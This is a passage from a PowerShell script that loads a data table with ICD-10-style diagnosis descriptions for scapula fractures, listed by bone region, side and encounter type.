nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, left shoulder","Displaced fracture of body of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of body of scapula, unspecified shoulder","Displaced fracture of body of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, right shoulder","Nondisplaced fracture of body of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, left shoulder","Nondisplaced fracture of body of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of body of scapula, unspecified shoulder","Nondisplaced fracture of body of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, right shoulder","Displaced fracture of acromial process, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, left shoulder","Displaced fracture of acromial process, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of acromial process, unspecified shoulder","Displaced fracture of acromial process, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, right shoulder","Nondisplaced fracture of acromial process, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, left shoulder","Nondisplaced fracture of acromial process, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of acromial process, unspecified shoulder","Nondisplaced fracture of acromial process, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, right shoulder","Displaced fracture of coracoid process, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, left shoulder","Displaced fracture of coracoid process, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of coracoid process, unspecified shoulder","Displaced fracture of coracoid process, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, right shoulder","Nondisplaced fracture of coracoid process, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, left shoulder","Nondisplaced fracture of coracoid process, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of coracoid process, unspecified shoulder","Nondisplaced fracture of coracoid process, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, right shoulder","Displaced fracture of glenoid cavity of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, left shoulder","Displaced fracture of glenoid cavity of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of glenoid cavity of scapula, unspecified shoulder","Displaced fracture of glenoid cavity of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, right shoulder","Nondisplaced fracture of glenoid cavity of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, left shoulder","Nondisplaced fracture of glenoid cavity of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder","Nondisplaced fracture of glenoid cavity of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, right shoulder","Displaced fracture of neck of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, left shoulder","Displaced fracture of neck of scapula, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of neck of scapula, unspecified shoulder","Displaced fracture of neck of scapula, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, right shoulder","Nondisplaced fracture of neck of scapula, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of scapula, left shoulder","Nondisplaced fracture of neck of scapula, left 